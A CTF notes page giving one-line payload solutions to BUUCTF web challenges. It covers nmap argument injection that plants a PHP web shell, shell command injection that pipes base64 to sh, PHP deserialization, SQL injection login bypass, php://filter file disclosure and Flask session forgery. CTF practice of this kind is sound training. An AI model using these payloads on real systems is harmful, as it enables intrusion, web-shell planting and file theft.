BUUCTF web

持续更新.jpg

[BUUCTF 2018]Online Tool
?host=' -oG hausa.php '
/906fe1fa9626a4ca7f39e700abc2e596/hausa.php?hausa=system("cat ../../../../flag");

[极客大挑战 2019]PHP
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

[GXYCTF2019]Ping Ping Ping
?ip=127.0.0.1;cat$IFS$1index.php
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

[RoarCTF 2019]Easy Calc
node3.buuoj.cn:27363/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

[GXYCTF2019]BabySQli
name:’ union select 1,”admin”,”6397887a55216b86387a94299937fd00″#(英文符号)
pw:hausa

[极客大挑战 2019]Secret File
1d9620ac-6889-454c-af53-5ec5043ce89e.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

[ACTF2020 新生赛]Include
7f61ea3e-d5cf-48f3-bef2-53c862704726.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php

[ACTF2020 新生赛]BackupFile
823aca79-c8de-49a4-9050-52fff93fb44d.node3.buuoj.cn/index.php?key=123

[HCTF 2018]admin
flask session伪造
解码代码:!ao!ao :https://www.cnblogs.com/chrysanthemum/p/11722351.html
编码代码:noraj : https://github.com/noraj/flask-session-cookie-manager